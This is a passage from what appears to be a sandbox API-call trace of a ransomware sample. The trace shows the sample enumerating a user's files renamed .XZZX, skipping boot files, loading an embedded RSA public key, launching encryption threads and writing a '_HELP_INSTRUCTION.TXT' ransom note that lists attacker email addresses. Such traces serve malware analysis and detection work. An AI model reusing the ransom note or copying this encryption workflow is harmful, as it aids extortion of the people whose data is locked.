HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.986] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc44 [0187.986] Sleep (dwMilliseconds=0x96) [0188.141] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0188.141] lstrcmpW (lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpString2="..") returned 1 [0188.141] lstrcmpW (lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpString2=".") returned 1 [0188.141] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0188.141] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="ntldr") returned 0x0 [0188.141] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="NTLDR") returned 0x0 [0188.141] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0188.142] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="ntdetect.com") returned 0x0 [0188.142] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0188.142] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0188.142] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.142] lstrcpyW (in: lpString1=0x17addc, lpString2="B7D698FE122EFCA3A766339E164FE0EB.XZZX" | out: lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned="B7D698FE122EFCA3A766339E164FE0EB.XZZX" [0188.142] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc48 [0188.142] WaitForSingleObject (hHandle=0xc48, dwMilliseconds=0xffffffff) returned 0x0 [0188.143] Sleep (dwMilliseconds=0x96) [0188.387] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0188.388] lstrcmpW (lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpString2="..") returned 1 [0188.388] lstrcmpW (lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpString2=".") returned 1 [0188.388] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0188.388] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="ntldr") returned 0x0 [0188.388] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="NTLDR") returned 0x0 [0188.388] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0188.388] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="ntdetect.com") returned 0x0 [0188.388] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0188.388] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0188.388] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.388] lstrcpyW (in: lpString1=0x17addc, lpString2="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" | out: lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" [0188.388] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc4c [0188.389] Sleep (dwMilliseconds=0x96) [0188.531] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0188.531] lstrcmpW (lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpString2="..") returned 1 [0188.531] lstrcmpW (lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpString2=".") returned 1 [0188.531] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0188.531] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="ntldr") returned 0x0 [0188.532] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="NTLDR") returned 0x0 [0188.532] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0188.532] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0188.532] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0188.532] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0188.532] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.532] lstrcpyW (in: lpString1=0x17addc, lpString2="BA853E823C01028A03C2DABB4021E6D2.XZZX" | out: lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX") returned="BA853E823C01028A03C2DABB4021E6D2.XZZX" [0188.532] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc50 [0188.532] Sleep (dwMilliseconds=0x96) [0188.687] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0188.688] lstrcmpW (lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpString2="..") returned 1 [0188.688] lstrcmpW (lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpString2=".") returned 1 [0188.688] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0188.688] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="ntldr") returned 0x0 [0188.688] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="NTLDR") returned 0x0 [0188.688] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0188.688] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="ntdetect.com") returned 0x0 [0188.688] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0188.688] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0188.688] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.688] lstrcpyW (in: lpString1=0x17addc, lpString2="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" | out: lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" [0188.688] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.688] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc54 [0188.689] Sleep (dwMilliseconds=0x96) [0188.843] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0188.843] lstrcmpW (lpString1="D02310330D7F24F9EA0895E311A00941.XZZX", lpString2="..") returned 1 [0188.844] lstrcmpW (lpString1="D02310330D7F24F9EA0895E311A00941.XZZX", lpString2=".") returned 1 [0188.844] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0188.844] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="ntldr") returned 0x0 [0188.844] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="NTLDR") returned 0x0 [0188.844] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0188.844] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="ntdetect.com") returned 0x0 [0188.844] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0188.844] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0188.844] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.844] lstrcpyW (in: lpString1=0x17addc, lpString2="D02310330D7F24F9EA0895E311A00941.XZZX" | out: lpString1="D02310330D7F24F9EA0895E311A00941.XZZX") returned="D02310330D7F24F9EA0895E311A00941.XZZX" [0188.844] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.844] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc58 [0188.845] Sleep (dwMilliseconds=0x96) [0188.999] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0188.999] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0188.999] lstrcmpW (lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpString2="..") returned 1 [0188.999] lstrcmpW (lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpString2=".") returned 1 [0188.999] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0188.999] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="ntldr") returned 0x0 [0188.999] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="NTLDR") returned 0x0 [0189.000] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0189.000] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="ntdetect.com") returned 0x0 [0189.000] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0189.000] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0189.000] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.000] lstrcpyW (in: lpString1=0x17addc, lpString2="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" | out: lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" [0189.000] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0189.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc5c [0189.000] Sleep (dwMilliseconds=0x96) [0189.155] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.155] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0189.155] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0189.155] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0189.156] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0189.156] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0189.156] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0189.156] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0189.156] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*" [0189.156] SetErrorMode (uMode=0x1) returned 0x1 [0189.156] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_HELP_INSTRUCTION.TXT") returned 90 [0189.156] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0189.156] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0189.156] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0xc60) returned 0x0 [0189.157] RegQueryValueExW (in: hKey=0xc60, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43aeee8, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43aeee8*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0189.157] RegCloseKey (hKey=0xc60) returned 0x0 [0189.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0189.157] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0189.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 